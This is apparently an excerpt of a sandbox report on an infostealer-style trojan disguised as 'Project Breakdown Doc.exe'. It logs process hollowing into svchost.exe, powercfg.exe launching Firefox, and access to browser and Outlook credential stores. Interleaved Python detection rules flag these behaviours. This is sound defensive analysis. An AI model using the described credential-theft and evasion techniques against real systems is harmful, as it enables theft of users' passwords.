                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBEFA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B32FC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B60F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE2F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B82F28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB4F40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52E90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFCE93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFEE26
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40E59
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B58DBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDCD1F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30CF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B8739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF132D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2D34C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B452A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5D2F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE12ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0B16B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2F172
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7516C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF70E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B470C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF7B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF16CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B85630
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C095C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDD5B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF7571
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF43F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B31460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5FB80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB5BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7DBF9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFB76
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDDAAC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B85AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE1AA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEDAC6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB3A6C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFA49
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF7A46
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD5910
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B49950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5B950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B438E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BAD800
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFFB1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B41F92
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B03FD2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B03FD5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFF09
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B49EB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5FDC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF7D73
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF1D5A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B43D40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFCF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB9C32
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BBF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03BAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03B87E54 appears 107 times
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: String function: 00C68B40 appears 42 times
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: String function: 00C47F41 appears 35 times
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: String function: 00C60D27 appears 70 times
                Source: Project Breakdown Doc.exe, 00000000.00000003.1682781306.00000000041B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Project Breakdown Doc.exe
                Source: Project Breakdown Doc.exe, 00000000.00000003.1684004083.00000000043AD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Project Breakdown Doc.exe
                Source: Project Breakdown Doc.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@4/4
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAA2D5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C98713 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C98CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CAB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CBF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CB86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C44FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | File created: C:\Users\user\AppData\Local\Temp\autC5D4.tmp
                Source: Project Breakdown Doc.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: powercfg.exe, 00000006.00000003.2455621276.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2935230373.0000000002F82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Project Breakdown Doc.exe | ReversingLabs: Detection: 52%
                Source: unknown | Process created: C:\Users\user\Desktop\Project Breakdown Doc.exe "C:\Users\user\Desktop\Project Breakdown Doc.exe"
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Project Breakdown Doc.exe"
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | Process created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\powercfg.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
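The process tree above carries three anomalies worth turning into detection logic: a 32-bit svchost.exe started by a user-desktop executable rather than services.exe, a child whose command line names a different image than the one mapped (the usual footprint of process hollowing, where the hollowed child is created with the parent's command line), and powercfg.exe spawning a browser. The following is an added example, not part of the Joe Sandbox report or of any vendor product. The event records are constructed from the rows above; the field names image, parent and cmdline are an assumption, not a specific log schema.

```python
"""Flag process-creation anomalies of the kind visible in the report's process tree.

Added example, not from the Joe Sandbox report. Events are constructed from the
report's 'Process created' rows; the field names are assumed, not a real schema.
"""
import ntpath

# Binaries that, on a healthy host, are launched by services.exe only.
SERVICE_HOSTS = {"svchost.exe"}
SERVICE_PARENTS = {"services.exe"}
# Browsers a user or shell launches, not a system utility.
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Utilities with no legitimate reason to spawn a browser.
LOLBIN_NO_BROWSER_CHILD = {"powercfg.exe"}


def _basename(path):
    """Case-folded file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def _cmdline_image(cmdline):
    """Return the executable named at the start of a command line."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def find_anomalies(events):
    """events: iterable of dicts with 'image', 'parent', 'cmdline'.

    Returns a list of (kind, subject, detail) tuples, one per triggered rule.
    """
    findings = []
    for ev in events:
        img = _basename(ev["image"])
        parent = _basename(ev["parent"])
        cmd_img = _cmdline_image(ev["cmdline"])
        # 1. Command line names a different executable than the mapped image:
        #    the child was created with the parent's command line and its
        #    image replaced afterwards (process hollowing footprint).
        if _basename(cmd_img) != img:
            findings.append(("cmdline_image_mismatch", ev["image"], cmd_img))
        # 2. A service host started by something other than services.exe.
        if img in SERVICE_HOSTS and parent not in SERVICE_PARENTS:
            findings.append(("unexpected_parent", ev["image"], ev["parent"]))
        # 3. 32-bit service host: on a 64-bit host svchost.exe normally runs
        #    from System32, so a SysWOW64 copy is worth a look on its own.
        if img in SERVICE_HOSTS and "syswow64" in ev["image"].lower():
            findings.append(("wow64_service_host", ev["image"], ""))
        # 4. A power-management utility launching a browser.
        if parent in LOLBIN_NO_BROWSER_CHILD and img in BROWSERS:
            findings.append(("lolbin_spawns_browser", ev["parent"], ev["image"]))
    return findings


# Constructed from the report's process tree (not a real log export).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\user\Desktop\Project Breakdown Doc.exe",
     "parent": "unknown",
     "cmdline": r'"C:\Users\user\Desktop\Project Breakdown Doc.exe"'},
    {"image": r"C:\Windows\SysWOW64\svchost.exe",
     "parent": r"C:\Users\user\Desktop\Project Breakdown Doc.exe",
     "cmdline": r'"C:\Users\user\Desktop\Project Breakdown Doc.exe"'},
    {"image": r"C:\Windows\SysWOW64\powercfg.exe",
     "parent": r"C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe",
     "cmdline": r'"C:\Windows\SysWOW64\powercfg.exe"'},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent": r"C:\Windows\SysWOW64\powercfg.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
]

if __name__ == "__main__":
    for kind, subject, detail in find_anomalies(SAMPLE_EVENTS):
        print(f"{kind:24s} {subject}  {detail}")
```

Rule 1 is the strongest of the four: a legitimate process is almost never created with a command line whose first token is a different executable, whereas the other three rules each have benign exceptions (repair tooling, 32-bit service hosts on some images, a utility shelling out to the default browser for help pages) and are best used as corroboration.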
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\powercfg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\powercfg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
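Taken one row at a time, none of the module loads above is remarkable: dpapi.dll and cryptbase.dll are loaded by most processes and winsqlite3.dll is a stock component. Together, in a process that is neither a browser nor a mail client, winsqlite3.dll plus vaultcli.dll plus dpapi.dll is the toolkit for reading a Chromium-style "Login Data" database (the CREATE TABLE password_notes string found in powercfg.exe memory is from that schema) and unwrapping its DPAPI-protected values, and the Outlook\Profiles key is where Outlook account credentials live. The block below is an added example, not part of the Joe Sandbox report, showing how to correlate those rows into two findings. The events are constructed from the Section loaded, File read and Key opened rows above; the kind/process/target field names are an assumption.

```python
"""Correlate module loads, file reads and registry access into credential-theft findings.

Added example, not from the Joe Sandbox report. Event records are constructed from
the report's rows; the 'kind', 'process' and 'target' field names are assumed.
"""
from collections import defaultdict
import ntpath

# A SQLite engine plus a way to unwrap DPAPI/Credential-Manager secrets is the
# combination needed to read browser login stores. Each DLL alone is common.
SQLITE_DLLS = {"winsqlite3.dll"}
SECRET_UNWRAP_DLLS = {"dpapi.dll", "vaultcli.dll"}
# Processes for which that combination is expected.
CREDENTIAL_OWNERS = {"firefox.exe", "chrome.exe", "msedge.exe", "outlook.exe"}
# Registry path fragment (lower-cased) under which Outlook keeps account data.
MAIL_PROFILE_MARK = "\\outlook\\profiles\\"
FIREFOX_PROFILE_INI = "\\mozilla\\firefox\\profiles.ini"


def correlate(events):
    """Return a list of (kind, process, detail) findings.

    Registry and file rules fire per event; the DLL rule fires once per process
    after all of its loads have been seen.
    """
    loaded = defaultdict(set)
    findings = []
    for ev in events:
        proc = ntpath.basename(ev["process"]).lower()
        target = ev["target"]
        if ev["kind"] == "image_load":
            loaded[proc].add(ntpath.basename(target).lower())
        elif ev["kind"] == "key_open":
            if MAIL_PROFILE_MARK in target.lower() and proc != "outlook.exe":
                findings.append(("mail_profile_access", proc, target))
        elif ev["kind"] == "file_read":
            if target.lower().endswith(FIREFOX_PROFILE_INI) and proc != "firefox.exe":
                findings.append(("firefox_profile_read", proc, target))
    for proc, dlls in loaded.items():
        if proc in CREDENTIAL_OWNERS:
            continue
        if dlls & SQLITE_DLLS and dlls & SECRET_UNWRAP_DLLS:
            toolkit = ",".join(sorted(dlls & (SQLITE_DLLS | SECRET_UNWRAP_DLLS)))
            findings.append(("browser_store_toolkit", proc, toolkit))
    return findings


POWERCFG = r"C:\Windows\SysWOW64\powercfg.exe"
DROPPER = r"C:\Users\user\Desktop\Project Breakdown Doc.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"

# Constructed from the report's rows (not a real log export).
SAMPLE_EVENTS = (
    [{"kind": "image_load", "process": POWERCFG, "target": d}
     for d in ("powrprof.dll", "wininet.dll", "winsqlite3.dll",
               "vaultcli.dll", "dpapi.dll", "cryptbase.dll")]
    + [{"kind": "image_load", "process": DROPPER, "target": "wininet.dll"}]
    # Constructed, not in the report: shows that a browser loading the same
    # DLLs is exempted by the allowlist.
    + [{"kind": "image_load", "process": FIREFOX, "target": d}
       for d in ("winsqlite3.dll", "dpapi.dll")]
    + [{"kind": "key_open", "process": POWERCFG,
        "target": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\"},
       {"kind": "file_read", "process": FIREFOX,
        "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"}]
)

if __name__ == "__main__":
    for kind, proc, detail in correlate(SAMPLE_EVENTS):
        print(f"{kind:24s} {proc:14s} {detail}")
```

The firefox.exe read of profiles.ini produces no finding here because Firefox is the owner of that file; the suspicious part of that row in the report is the parent that launched Firefox, which is a process-tree question rather than a file-access one.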
                Source: Project Breakdown Doc.exe | Static file information: File size 1368576 > 1048576
                Source: Project Breakdown Doc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Project Breakdown Doc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Project Breakdown Doc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Project Breakdown Doc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Project Breakdown Doc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Project Breakdown Doc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Project Breakdown Doc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: powercfg.pdbGCTL | source: svchost.exe, 00000001.00000003.2228239971.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228322978.000000000342D000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000002.2936102809.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: VFfhzkOtKq.exe, 00000005.00000002.2934981003.000000000006E000.00000002.00000001.01000000.00000005.sdmp, VFfhzkOtKq.exe, 00000007.00000000.2336603194.000000000006E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP | source: Project Breakdown Doc.exe, 00000000.00000003.1684251389.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, Project Breakdown Doc.exe, 00000000.00000003.1683276387.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2157215051.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2159064996.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.000000000386E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2262467626.0000000003528000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2259628969.0000000003372000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb | source: Project Breakdown Doc.exe, 00000000.00000003.1684251389.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, Project Breakdown Doc.exe, 00000000.00000003.1683276387.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2157215051.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2159064996.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.000000000386E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2262467626.0000000003528000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2259628969.0000000003372000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb | source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937780821.0000000003CFC000.00000004.10000000.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2570813989.000000002144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP | source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937780821.0000000003CFC000.00000004.10000000.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2570813989.000000002144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: powercfg.pdb | source: svchost.exe, 00000001.00000003.2228239971.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228322978.000000000342D000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000002.2936102809.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Project Breakdown Doc.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Project Breakdown Doc.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Project Breakdown Doc.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Project Breakdown Doc.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Project Breakdown Doc.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CBC304 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00CA8719 push FFFFFF8Bh; iretd 0_2_00CA871B
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C6E94F push edi; ret 0_2_00C6E951
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C6EA68 push esi; ret 0_2_00C6EA6A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C68B85 push ecx; ret 0_2_00C68B98
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C6EC43 push esi; ret 0_2_00C6EC45
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exe | Code function: 0_2_00C6ED2C push edi; ret 0_2_00C6ED2E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042D863 push edi; iretd 1_2_0042D86C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004051C0 pushad ; ret 1_2_004051CB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414A5F push edx; retf 1_2_00414A60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D48E push cs; ret 1_2_0040D4BB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00424CB3 push edi; ret 1_2_00424CD5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004164BD push ecx; ret 1_2_004164DD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403570 push eax; ret 1_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414D03 push ss; ret 1_2_00414D04
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418712 push ebp; iretd 1_2_0041871A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B0225F pushad ; ret 1_2_03B027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B027FA pushad ; ret 1_2_03B027F9
